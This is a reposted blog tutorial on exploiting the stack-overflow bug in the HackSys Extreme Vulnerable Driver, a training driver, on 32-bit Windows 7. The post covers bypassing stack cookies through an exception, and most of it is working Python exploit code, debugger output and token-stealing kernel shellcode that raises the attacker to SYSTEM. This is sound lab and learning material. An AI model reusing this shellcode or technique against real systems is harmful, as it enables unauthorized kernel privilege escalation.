HEVD Stack Overflow GS

Nytro · September 6, 2017

HEVD Stack Overflow GS

Posted on September 5, 2017

Lately, I've decided to play around with HackSys Extreme Vulnerable Driver (HEVD) for fun. It's a great way to familiarize yourself with Windows exploitation. In this blog post, I'll show how to exploit the stack overflow that is protected with /GS stack cookies on Windows 7 SP1 32 bit. You can find the source code here. It has a few more exploits written and a Win10 pre-anniversary version of the regular stack buffer overflow vulnerability.

Triggering the Vulnerable Function

To start, we need to find the ioctl dispatch routine in HEVD. Looking for theIRP_MJ_DEVICE_CONTROL IRP, we see that the dispatch function can be found at hevd+508e.

kd> !drvobj hevd 2
Driver object (852b77f0) is for:
 \Driver\HEVD
DriverEntry:   995cb129	HEVD
DriverStartIo: 00000000	
DriverUnload:  995ca016	HEVD
AddDevice:     00000000	

Dispatch routines:
[00] IRP_MJ_CREATE                      995c9ff2	HEVD+0x4ff2
[01] IRP_MJ_CREATE_NAMED_PIPE           995ca064	HEVD+0x5064
...
[0e] IRP_MJ_DEVICE_CONTROL              995ca08e	HEVD+0x508e
[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL     995ca064	HEVD+0x5064
[10] IRP_MJ_SHUTDOWN                    995ca064	HEVD+0x5064
[11] IRP_MJ_LOCK_CONTROL                995ca064	HEVD+0x5064
[12] IRP_MJ_CLEANUP                     995ca064	HEVD+0x5064
[13] IRP_MJ_CREATE_MAILSLOT             995ca064	HEVD+0x5064
[14] IRP_MJ_QUERY_SECURITY              995ca064	HEVD+0x5064
[15] IRP_MJ_SET_SECURITY                995ca064	HEVD+0x5064
...

Finding the ioctl request number requires very light reverse engineering. We want to end up eventually at hevd+515a. At hevd+50b4, the request number is subtracted by 222003h. If it was 222003h, then jump to hevd+5172, or else fall through to hevd+50bf. In this basic block, our ioctl request number is subtracted by 4. If the result is 0, we are where we want to be. Therefore, our ioctl number should be 222007h.

Eventually, a memcpy is reached where the calling function does not check the copy size.

To give the overflow code a quick run, we call it with benign input using the code below. You can find the implementation of mmap and write in the full source code.

def trigger_stackoverflow_gs(addr, size):
    dwReturn = c_ulong()
    driver_handle = kernel32.CreateFileW(DEVICE_NAME,
                                         GENERIC_READ | GENERIC_WRITE,
                                         0, None, OPEN_EXISTING, 0, None)
    if not driver_handle or driver_handle == -1:
        sys.exit()

    print "[+] IOCTL: 0x222007"
    dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222007,
                                         addr, size,
                                         None, 0,
                                         byref(dwReturn), None)

m = mmap()
write(m, 'A'*10)
trigger_stackoverflow_gs(m, 10)

In WinDbg, the debug output confirms that we are calling the right ioctl.

From the figure, we can see that the kernel buffer is 0x200 in size so if we run a PoC again, but with 0x250 As, we should overflow the stack cookie and blue screens our VM.

Indeed, the bugcheck tells us that the system crashed due to a stack buffer overflow. Stack cookies in Windows are first XORed with ebp before they're stored on the stack. If we take the cookie in the bugcheck, and XOR it with 41414141, the result should resemble a stack address. Specifically, it should be the stack base pointer for hevd+48da.

kd> ? e9d25b91 ^ 41414141
Evaluate expression: -1466754352 = a8931ad0

Bypassing Stack Cookies

A common way to bypass stack cookies, introduced by David Litchfield, is to cause the program to throw an exception before the stack cookie is checked at the end of the function. This works because when an exception occurs, the stack cookie is not checked.

There are two ways [generating an exception] might happen--one we can control and the other is dependent of the code of the vulnerable function. In the latter case, if we overflow other data, for example parameters that were pushed onto the stack to the vulnerable function and these are referenced before the cookie check is performed then we could cause an exception here by setting this data to something that will cause an exception. If the code of the vulnerable function has been written in such a way that no opportunity exists to do this, then we have to attempt to generate our own exception. We can do this by attempting to write beyond the end of the stack.

For us, it's easy because the vulnerable function uses memcpy. We can simply force memcpy to segfault by letting it continue copying the source buffer all the way to unmapped memory.

I use my mmap function to map two adjacent pages, then munmap to unmap the second page. mmap and munmap are just simple wrappers I wrote for NtAllocateVirtualMemoryand NtFreeVirtualMemory respectively. The idea is to place the source buffer at the end of the mapped page that was mapped, and have the vulnerable memcpy read off into the unmapped page to cause an exception.

To test this, we'll use the PoC code below.

m = mmap(size=0x2000)
munmap(m+0x1000)

trigger_stackoverflow_gs(m+0x1000-0x250, 0x251)

Back in the debugger, we can observe that an exception was thrown and eip was overwritten as a result of the exception handler being overwritten.

The next step is to find the offset of the As so we can control eip to point to shellcode. You can use a binary search type way to find the offset, but an easier method is to use a De Bruijn sequence as the payload. I usually use Metasploit's pattern_create.rb andpattern_offset.rb for finding the exact offset in my buffer.

Exception handler crash patter_create.rb

The figure above shows us 41367241 overwrites the exception handler address and so also eip.

kd> .formats 41367241
Evaluate expression:
  Hex:     41367241
  Decimal: 1094087233
  Octal:   10115471101
  Binary:  01000001 00110110 01110010 01000001
  Chars:   A6rA
  Time:    Wed Sep  1 18:07:13 2004
  Float:   low 11.4029 high 0
  Double:  5.40551e-315

Reversing the order due to endianness, we get Ar6A which pattern_offset.rb tells us is offset 528 (0x210). Therefore, our source buffer will be of size 0x210+4, where the 4 is due to the address of our shellcode.

Constructing Shellcode

Since there is 0x1000-0x210-4 unused space in our allocated page, we can just put our shellcode in the beginning of the page. I use common Windows token stealing shellcode that basically iterates through the _EPROCESSs, looks for the SYSTEM process, and copies the SYSTEM process' token. Additionally, for convenience in breaking at the shellcode, I prepend the shellcode with a breakpoint (\xcc).

\xcc\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00
\x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8
\x00\x00\x00\x89\x91\xf8\x00\x00\x00

Our shellcode still isn't complete yet; the shellcode doesn't know where to return to after it executes. To search for a return address, let's inspect the call stack in the debugger when the shellcode executes.

kd> k
 # ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 a88cf114 82ab3622 0x1540000
01 a88cf138 82ab35f4 nt!ExecuteHandler2+0x26
02 a88cf15c 82ae73b5 nt!ExecuteHandler+0x24
03 a88cf1f0 82af005c nt!RtlDispatchException+0xb6
04 a88cf77c 82a79dd6 nt!KiDispatchException+0x17c
05 a88cf7e4 82a79d8a nt!CommonDispatchException+0x4a
06 a88cf868 995c9969 nt!KiExceptionExit+0x192
07 a88cf86c a88cf8b4 HEVD+0x4969
08 a88cf870 01540dec 0xa88cf8b4
09 a88cf8b4 41414141 0x1540dec
0a a88cf8b8 41414141 0x41414141
0b a88cf8bc 41414141 0x41414141
...
51 a88cfad0 995c99ca 0x41414141
52 a88cfae0 995ca16d HEVD+0x49ca
53 a88cfafc 82a72593 HEVD+0x516d
54 a88cfb14 82c6699f nt!IofCallDriver+0x63

hevd+4969 is the instruction address after the memcpy, but we can't return here because the portion of stack the remaining code uses is corrupted. Fixing the stack to the correct values would be extremely annoying. Instead, returning to hevd+49ca which is the return address of the stack frame right below hevd+4969 makes more sense.

However, if you adjust the stack and return to hevd+49ca, you'll still get a crash. The problem is at hevd+5260 where edi+0x1c is dereferenced. edi at this point is 0 because registers are XORed with themselves before the exception handler assumes control and neither the program nor our shellcode touched edi.

In a normal execution, edi and other registers are restored in __SEH_epilog4. These values are of course restored from the stack. Taking a88cf86c from the stack trace before, we can dump and attempt to find the restore values. They're actually are quite easy to find here because hevd+5dcc is quite easy to spot. hevd+5dcc is the address of the debug print string which is restored into ebx.

kd> dds a88cf86c
a88cf86c  995c9969 HEVD+0x4969
a88cf870  a88cf8b4
a88cf874  01540dec
a88cf878  00000218
a88cf87c  995ca760 HEVD+0x5760
a88cf880  995ca31a HEVD+0x531a
a88cf884  00000200
a88cf888  995ca338 HEVD+0x5338
a88cf88c  a88cf8b4
a88cf890  995ca3a2 HEVD+0x53a2
a88cf894  00000218
a88cf898  995ca3be HEVD+0x53be
a88cf89c  01540dec
a88cf8a0  31d15d0b
a88cf8a4  8c843f68 <-- edi
a88cf8a8  8c843fd8 <-- esi
a88cf8ac  995cadcc HEVD+0x5dcc <-- ebx
a88cf8b0  455f5359
a88cf8b4  41414141
a88cf8b8  41414141

To obtain the offset of edi, just subtract esp from the current address of the restore value.

kd> ? a88cf8a4 - esp
Evaluate expression: 1932 = 0000078c
kd> dds a88cfad0 la
a88cfad0  a88cfae0
a88cfad4  995c99ca HEVD+0x49ca
a88cfad8  01540dec
a88cfadc  00000218
a88cfae0  a88cfafc
a88cfae4  995ca16d HEVD+0x516d
a88cfae8  8c843f68
a88cfaec  8c843fd8
a88cfaf0  86c3c398
a88cfaf4  8586f5f0
kd> ? a88cfad0 - esp
Evaluate expression: 2488 = 000009b8

Similarly, finding the offset to return to is found by obtaining the difference of a88cfad0and esp.

Lastly, our shellcode should pop ebp; ret 8; which results in

start:
  xor eax, eax;
  mov eax,dword ptr fs:[eax+0x124]; # nt!_KPCR.PcrbData.CurrentThread
  mov eax,dword ptr [eax+0x50];     # nt!_KTHREAD.ApcState.Process
  mov ecx,eax;                      # Store unprivileged _EPROCESS in ecx
loop:
  mov eax,dword ptr [eax+0xb8];     # Next nt!_EPROCESS.ActiveProcessLinks.Flink
  sub eax, 0xb8;                    # Back to the beginning of _EPROCESS
  cmp dword ptr [eax+0xb4],0x04;    # SYSTEM process? nt!_EPROCESS.UniqueProcessId
  jne loop;
stealtoken:
  mov edx,dword ptr [eax+0xf8];     # Get SYSTEM nt!_EPROCESS.Token
  mov dword ptr [ecx+0xf8],edx;     # Copy token
restore:
  mov edi, [esp+0x78c];             # edi irq
  mov esi, [esp+0x790];             # esi
  mov ebx, [esp+0x794];             # move print string into ebx
  add esp, 0x9b8;
  pop ebp;
  ret 0x8;

Gaining NT Authority\SYSTEM

Putting everything together, the final exploit looks like this.

m = mmap(size=0x2000)
munmap(m+0x1000)
size = 0x210+4

sc = '\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x8b\xbc\x24\x8c\x07\x00\x00\x8b\xb4\x24\x90\x07\x00\x00\x8b\x9c\x24\x94\x07\x00\x00\x81\xc4\xb8\x09\x00\x00\x5d\xc2\x08\x00'
write(m, sc + 'A'*(0x1000-4-len(sc)) + struct.pack("<I", m))
trigger_stackoverflow_gs(m+0x1000-size, size+1)

print '\n[+] Privilege Escalated\n'
os.system('cmd.exe')

And that should give us: